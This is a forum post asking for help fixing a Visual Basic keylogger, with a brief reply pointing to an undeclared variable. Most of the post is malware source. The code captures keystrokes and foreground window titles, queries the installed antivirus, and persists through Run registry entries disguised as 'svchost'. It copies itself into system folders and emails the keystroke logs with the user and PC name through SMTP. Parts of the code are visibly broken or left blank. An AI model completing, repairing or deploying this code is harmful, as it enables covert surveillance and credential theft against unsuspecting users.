All Viewers I am facing some issue during making keylogger I put all code here, please help me to solve out this problem...

Here is Code:

Public Declare Function IsNTAdmin Lib "advpack" (ByVal dwReserved As Long, ByRef lpdwReserved As Long) As Long
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function lOpen Lib "kernel32" Alias "_lopen" (ByVal lpPathName As String, ByVal iReadWrite As Long) As Long
Private Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Integer) As Integer
Private Declare Function GetAsyncKeysync Lib "user32" (ByVal vkey As Integer) As Integer
Public appexe As String
Public roross, rorosss, atach, roros, windirpath, appdirpath, str As String

Public countss, tesss As Integer
Public lpFSHigh As Long
Const OF_READ = &H0&

Function getdumpkey()
On Error Resume Next

    Dim lngShift As Long
   lngShift = GetAsyncKeyState(vbKeyShift)

For poiints = 1 To 255
            reresu = 0
           reresu = GetAsyncKeyState(poiints)
           If reresu = -32767 Then

                     If poiints >= 48 And poiints <= 57 Then
            Dim shifti As String

                Select Case poiints
                    Case 49
                      If lngShift = 0 Then shifti = "1"
                      If lngShift <> 0 Then shifti = "!"
                    Case 50
                      If lngShift = 0 Then shifti = "2"
                      If lngShift <> 0 Then shifti = "@"
                    Case 51
                      If lngShift = 0 Then shifti = "3"
                      If lngShift <> 0 Then shifti = "#"
                    Case 52
                      If lngShift = 0 Then shifti = "4"
                      If lngShift <> 0 Then shifti = "$"
                    Case 53
                      If lngShift = 0 Then shifti = "5"
                      If lngShift <> 0 Then shifti = "%"
                    Case 54
                      If lngShift = 0 Then shifti = "6"
                      If lngShift <> 0 Then shifti = "^"
                    Case 55
                      If lngShift = 0 Then shifti = "7"
                      If lngShift <> 0 Then shifti = "&"
                    Case 56
                      If lngShift = 0 Then shifti = "8"
                      If lngShift <> 0 Then shifti = "*"
                    Case 57
                      If lngShift = 0 Then shifti = "9"
                      If lngShift <> 0 Then shifti = "("
                    Case 48
                     If lngShift = 0 Then shifti = "0"
               If lngShift <> 0 Then shifti = ")"
                   End Select
                Form1.TextBox2.Text = Form1.TextBox2.Text + shifti
           End If

                If poiints >= 65 And poiints <= 97 Then
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & Chr(poiints + 32)
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & UCase(Chr(poiints))
                End If

                Select Case poiints

                    Case 13
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Enter]"
                    Case 96
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 0]"
                    Case 97
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 1]"
                    Case 98
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 2]"
                    Case 99
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 3]"
                    Case 100
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 4]"
                    Case 101
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 5]"
                    Case 102
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 6]"
                    Case 103
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 7]"
                    Case 104
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 8]"
                    Case 105
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Numpad 9]"
                    Case 106
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Multiply]"
                    Case 107
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Add]"
                    Case 32
                        Form1.TextBox2.Text = Form1.TextBox2.Text & " "
                    Case 46
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[DELETE]"
                    Case 8
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[backspace]"
                    Case 17
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[ctrl]"
                    Case 164

                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[l-alt]"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & vbCrLf & "language changed" & vbCrLf

                    Case 165

                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[r-alt]"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & vbCrLf & "language changed" & vbCrLf

                    Case 20
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[cops lock]"
                    Case 27
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[esc]"
                    Case 33
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[pageup]"
                    Case 34
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[pagedown]"
                    Case 35
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[end]"
                    Case 36
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[home]"
                    Case 37
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[lift]"
                    Case 38
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[up]"
                    Case 39
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Right]"
                    Case 40
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[Down]"
                    Case 38
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[up]"
                    Case 186
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & ";"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & ":"

                    Case 187
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "="
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "+"

                    Case 189
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "-"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "_"

                    Case 191
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "/"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "?"

                    Case 192
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "`"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "~"

                    Case 189
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "-"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "_"

                    Case 220

                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "\"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "|"

                    Case 221
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "]"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "}"

                    Case 219
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "["
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "{"

                    Case 222
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "'"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & """"

                    Case 188
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & ","
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "<"

                    Case 190
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "."
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & ">"
                    Case 191
                        If lngShift = 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "\"
                        If lngShift <> 0 Then Form1.TextBox2.Text = Form1.TextBox2.Text & "|"
                    Case 112
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f1]"
                    Case 113
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f2]"
                    Case 114
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f3]"
                    Case 115
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f4]"
                    Case 116
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f5]"
                    Case 117
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f6]"
                    Case 118
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f7]"
                    Case 119
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f8]"
                    Case 120
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f9]"
                    Case 122
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f11]"
                    Case 123
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[f12]"
                    Case 9
                        Form1.TextBox2.Text = Form1.TextBox2.Text & "[tab]"
                End Select

            End If

        Next poiints

        Static lHwnd As Long
    Dim lCurHwnd As Long
    Dim sText As String * 255
   lCurHwnd = GetForegroundWindow
    If lCurHwnd = lHwnd Then Exit Function
    lHwnd = lCurHwnd

    If lHwnd <> hwnd Then
        Form1.TextBox2.Text = Form1.TextBox2.Text & vbCrLf & "  ----- " & Left$(sText, GetWindowText(lHwnd, ByVal sText, 255)) & " ----- " & Date & " -- " & Time & " ---" & vbCrLf
    End If
  End Function

Public Function getosvertion() As String
On Error Resume Next
Dim var55 As String ''
Dim objOS As Object
For Each objOS In GetObject( _
  var55 = objOS.Caption
getosvertion = var55
End Function

Public Function antivarver() As String
    On Error Resume Next
    Set objWMIService = GetObject("winmgmts:\\.\root\SecurityCenter")
    Dim temprary As String
    Set colmanitems = objWMIService.ExecQuery("Select * from AntiVirusProduct", , 48)
    For Each objItem In colmanitems
    If GetVersion = True Then temprary = objItem.CompanyName & " " & objItem.DisplayName & " (Version  " & objItem.versionnumber & ")"
    If GetVersion = False Then temprary = objItem.CompanyName & objItem.DisplayName
    antivarver = endt & temprary
End Function

Public Function jjifhfhjdksjdhujddekjuek()
On Error Resume Next
Dim addmetoreg As Object
Set addmetoreg = CreateObject("WScript.Shell")
        If IsNTAdmin(0, 0) = 1 Then
        appexe = windirpath & "\" & App.EXEName & ".exe"
        addmetoreg.RegWrite "HKLM\Software\Microsoft\windows\CurrentVersion\Run\svchost", appexe
        appexe = appdirpath & "\" & App.EXEName & ".exe"
        addmetoreg.RegWrite "HKCU\Software\Microsoft\windows\CurrentVersion\Run\svchost", appexe
      End If
End Function

Public Function makemein()
On Error Resume Next
Dim appexe As String
Dim appexe1 As String

    If IsNTAdmin(0, 0) Then
        appexe = windirpath & "\" & App.EXEName & ".exe"
        a = margooo(gettheoath, appexe1)
        appexe1 = appdirpath & "\" & App.EXEName & ".exe"
       a = margooo(gettheoath, appexe)
    End If
End Function

Function margooo(src As String, dest As String, Optional FailIfDestExists As Boolean)
On Error Resume Next
Dim oraclesorse
Const OverwriteExisting = True
Set oraclesorse = CreateObject("Scripting.FileSystemObject")
oraclesorse.CopyFile src, dest, OverwriteExisting
End Function

Public Function Checksize()
On Error Resume Next
Dim Pointer As Long, sizeofthefile As Long
Pointer = lOpen(atach, OF_READ)
sizeofthefile = GetFileSize(Pointer, lpFSHigh)
If sizeofthefile > 10000000 Then
    If IsNTAdmin(0, 0) Then
        atach = windirpath & "\wmaspids" & countss + 1 & ".log"
        atach = appdirpath & "\wmaspids" & countss + 1 & ".log"
    End If
End If
End Function

Public Function savefile()
On Error Resume Next
 Dim hFile As Long
   Dim sFilename As String
   sFilename = atach
   hFile = FreeFile
   Open sFilename For Append As #hFile
      Print #hFile, Form1.TextBox2.Text
   Close #hFile
   Form1.TextBox2 = ""
End Function

Public Function sendiftome()
On Error Resume Next
Dim iMsg As Object
Dim iConf As Object
Dim Flds As Variant
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
iConf.Load -1
Set Flds = iConf.Fields
With Flds
.Item("") = 1
.Item("") = 1
.Item("") = "YOUR-Email"
.Item("") = YOUR-Pass
.Item("") = ""
.Item("") = 2
.Item("") = 25
End With
strbody = "Your Sample message "
If tesss = 30 Then
With iMsg
Set .Configuration = iConf
.To = ""
.CC = ""
.BCC = ""
.From = ""
.Subject = "USER NAME: " & Environ("USERNAME") & " >>>  PC NAME: " & Environ("COMPUTERNAME")
.TextBody = str
.AddAttachment atach
End With
tesss = 1
tesss = tesss + 1
End If
End Function

Problem is in Argument value passing. Nowhere I find the variable gettheoath.
Declare the variable as per parameter type or check the variable type if you declare it as Global/Public variable in the main Module.

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